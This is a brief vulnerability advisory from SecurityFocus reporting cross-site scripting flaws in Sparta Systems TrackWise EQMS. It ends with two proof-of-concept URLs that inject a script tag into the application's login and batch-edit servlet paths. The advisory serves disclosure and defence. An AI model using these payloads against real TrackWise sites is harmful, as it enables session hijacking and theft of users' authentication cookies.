source: https://www.securityfocus.com/bid/38483/info
SpartaSystemsTrackWiseEQMS is prone tomultiple cross-site scripting vulnerabilities because the application fails toproperly sanitize user-supplied input.
An attacker may leverage these issues toexecute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker tosteal cookie-based authentication credentials and tolaunch other attacks.
http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>alert('XSS-By-Lament')</script>
http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/"><script>alert('XSS-By-Lament')</script>